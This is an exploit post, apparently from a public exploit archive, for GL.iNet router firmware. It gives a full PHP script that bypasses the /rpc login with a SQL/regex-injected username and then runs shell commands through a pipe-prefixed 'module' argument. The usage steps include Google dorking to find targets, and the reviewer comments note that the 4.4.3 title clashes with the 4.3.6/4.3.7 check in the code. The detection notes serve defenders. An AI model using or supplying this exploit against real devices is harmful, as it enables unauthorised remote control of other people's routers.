Headline
GL.iNet 4.4.3 Code Injection
GL.iNet version 4.4.3 suffers from authentication bypass and code injection vulnerabilities.
=============================================================================================================================================
| # Title : GL.iNet network 4.4.3 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.gl-inet.com/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] uses the CURL to Allow remote command .
[+] Line 158 set your target .
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php
[+] PayLoad :
<?php
/**
 * Proof-of-concept client for a GL.iNet device's JSON-RPC endpoint (`/rpc`).
 *
 * Reading guide for defenders and reviewers:
 *  - Every request in this listing is a POST to `<target>/rpc` with a JSON-RPC 2.0 body.
 *  - auth_bypass() sends a `challenge` call followed by a `login` call whose `username`
 *    is not a plain account name: it contains `[`, `^`, `'`, spaces and `--`.
 *  - execute_command() sends a `call` to `logread` / `get_system_log` whose `module`
 *    argument begins with the shell pipe character `|`.
 *
 * Detection ideas that follow directly from those request shapes: alert on `login` or
 * `challenge` calls whose username contains anything outside a short allowlist of
 * account-name characters, and on `get_system_log` calls whose `module` or `lines`
 * argument contains shell metacharacters.
 *
 * Mitigation: install the firmware release the vendor lists as fixed and keep the
 * administration interface unreachable from untrusted networks.
 *
 * NOTE(review): the page title names version 4.4.3, but check_vuln_version() below only
 * matches firmware 4.3.6 / 4.3.7 on three models — confirm the affected range against the
 * vendor advisory rather than relying on this script.
 */
class GlinetExploit
{
    // Base URL of the device; each request URI is appended to it unchanged.
    private $targetUri;
    // Session id taken from the `login` response; null until auth_bypass() succeeds.
    private $sid;
    // Model, firmware and arch recorded by check_vuln_version().
    private $glinet;

    /**
     * Store the base URL and initialise the device-information record to nulls.
     *
     * @param string $targetUri Base URL of the device (scheme and host, no trailing path).
     */
    public function __construct($targetUri)
    {
        $this->targetUri = $targetUri;
        $this->glinet = [
            'model' => null,
            'firmware' => null,
            'arch' => null
        ];
    }

    /**
     * Send one HTTP request with cURL and decode the JSON response.
     *
     * No timeout or TLS-related option is set here, so cURL defaults apply.
     *
     * @param string      $method  HTTP method, passed as CURLOPT_CUSTOMREQUEST.
     * @param string      $uri     Path appended to the base URL.
     * @param string|null $data    Request body; only attached when truthy.
     * @param array       $headers Header lines supplied by the caller.
     * @return array|null Decoded response as an associative array, or null when
     *                    curl_exec() returns a falsy value or the body is not valid JSON.
     */
    private function send_request($method, $uri, $data = null, $headers = [])
    {
        $ch = curl_init();
        $options = [
            CURLOPT_URL => $this->targetUri . $uri,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_CUSTOMREQUEST => $method
        ];
        if ($data) {
            $options[CURLOPT_POSTFIELDS] = $data;
            // $headers is extended here, but no cURL option in this listing consumes it,
            // so detections should not depend on a Content-Type or Admin-Token header
            // being present in traffic from this script.
            $headers[] = 'Content-Type: application/json';
        }
        curl_setopt_array($ch, $options);
        $response = curl_exec($ch);
        curl_close($ch);
        return $response ? json_decode($response, true) : null;
    }

    /**
     * Query the device for its model and firmware and compare them to a fixed list.
     *
     * The `call` is sent with an empty string in the session-id position, i.e. before
     * any login. NOTE(review): if the device answers it, model and firmware_version are
     * readable without authentication — confirm on the device and consider whether that
     * disclosure is acceptable on the interfaces where `/rpc` is reachable.
     *
     * The comparison uses '==' against a single version per model, so a false return
     * says nothing about whether other firmware versions or models are affected.
     *
     * @return bool True only for sft1200 at 4.3.6 or ar750/ar750s at 4.3.7.
     */
    public function check_vuln_version()
    {
        $postData = json_encode([
            'jsonrpc' => '2.0',
            'id' => rand(1000, 9999),
            'method' => 'call',
            'params' => ['', 'ui', 'check_initialized', []]
        ]);
        $res = $this->send_request('POST', '/rpc', $postData);
        if ($res && isset($res['result'])) {
            $this->glinet['model'] = $res['result']['model'];
            $this->glinet['firmware'] = $res['result']['firmware_version'];
        }
        // Check for vulnerable models and firmware
        switch ($this->glinet['model']) {
            case 'sft1200':
                $this->glinet['arch'] = 'mipsle';
                return version_compare($this->glinet['firmware'], '4.3.6', '==');
            case 'ar750':
            case 'ar750s':
                $this->glinet['arch'] = 'mipsbe';
                return version_compare($this->glinet['firmware'], '4.3.7', '==');
            // Add more cases as per your requirement
        }
        return false;
    }

    /**
     * Obtain a session id through the `challenge` / `login` exchange.
     *
     * Returns the cached session id when one is already stored. Otherwise it requests
     * a nonce for user `root`, then submits `login` with a crafted username and the
     * MD5 of "username:pw:nonce", where pw is the literal string '0'.
     *
     * @return string|null Session id from the `login` response, or null when either
     *                     response lacks the expected field.
     */
    public function auth_bypass()
    {
        if (!empty($this->sid)) {
            return $this->sid;
        }
        $postData = json_encode([
            'jsonrpc' => '2.0',
            'id' => rand(1000, 9999),
            'method' => 'challenge',
            'params' => ['username' => 'root']
        ]);
        $res = $this->send_request('POST', '/rpc', $postData);
        if ($res && isset($res['result']['nonce'])) {
            $nonce = $res['result']['nonce'];
            // The username mixes regex syntax with a SQL UNION fragment;
            // char(114,111,111,116) is the byte sequence for "root".
            // NOTE(review): presumably the device evaluates the username in both a
            // pattern-matching and a SQL context without validating it — confirm against
            // the vendor advisory. A strict allowlist on the username field rejects this
            // value, and its metacharacters make it easy to flag in request logs.
            $username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+";
            $pw = '0';
            $hash = md5("$username:$pw:$nonce");
            $postData = json_encode([
                'jsonrpc' => '2.0',
                'id' => rand(1000, 9999),
                'method' => 'login',
                'params' => [
                    'username' => $username,
                    'hash' => $hash
                ]
            ]);
            $res = $this->send_request('POST', '/rpc', $postData);
            if ($res && isset($res['result']['sid'])) {
                $this->sid = $res['result']['sid'];
                return $this->sid;
            }
        }
        return null;
    }

    /**
     * Send a `logread` / `get_system_log` call whose `module` argument carries a command.
     *
     * The command is base64-encoded and wrapped in a decode-and-run pipeline, and the
     * resulting string is prefixed with `|` before being placed in `module`.
     * NOTE(review): the leading pipe implies the device passes `module` to a shell
     * unescaped — confirm against the vendor advisory. On the device side the fix is to
     * accept only known module names and to avoid building a shell command from them.
     * For detection, any `module` value containing `|` or other shell metacharacters is
     * anomalous, as is `openssl enc -base64 -d` followed by `sh` in process telemetry.
     *
     * @param string $cmd Command text to embed.
     * @return array|null Decoded response from send_request().
     */
    public function execute_command($cmd)
    {
        $payload = base64_encode($cmd);
        $cmd = "echo {$payload}|openssl enc -base64 -d -A|sh";
        $postData = json_encode([
            'jsonrpc' => '2.0',
            'id' => rand(1000, 9999),
            'method' => 'call',
            'params' => [
                $this->sid,
                'logread',
                'get_system_log',
                ['lines' => '', 'module' => "|{$cmd}"]
            ]
        ]);
        return $this->send_request('POST', '/rpc', $postData, ['Admin-Token: ' . $this->sid]);
    }

    /**
     * Report whether check_vuln_version() matched one of its hard-coded model/firmware pairs.
     *
     * 'Not Vulnerable' here only means "no exact match in that list"; it is not evidence
     * that a device is patched.
     *
     * @return string Human-readable result line.
     */
    public function check()
    {
        if ($this->check_vuln_version()) {
            return "Vulnerable: {$this->glinet['model']} | {$this->glinet['firmware']} | {$this->glinet['arch']}";
        }
        return 'Not Vulnerable';
    }

    /**
     * Run auth_bypass() and, when a session id is obtained, execute_command().
     *
     * This path does not call check_vuln_version() first. The response returned by
     * execute_command() is discarded; only status lines are echoed.
     *
     * @param string $command Command text handed to execute_command().
     */
    public function exploit($command)
    {
        $this->sid = $this->auth_bypass();
        if ($this->sid) {
            echo "SID: {$this->sid}\n";
            echo "Executing: {$command}\n";
            $this->execute_command($command);
        } else {
            echo "Authentication bypass failed.\n";
        }
    }
}
// Usage ('https://target-url' is the author's placeholder, not a real host)
$exploit = new GlinetExploit('https://target-url');
$exploit->exploit('ls');
Greetings to :
=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================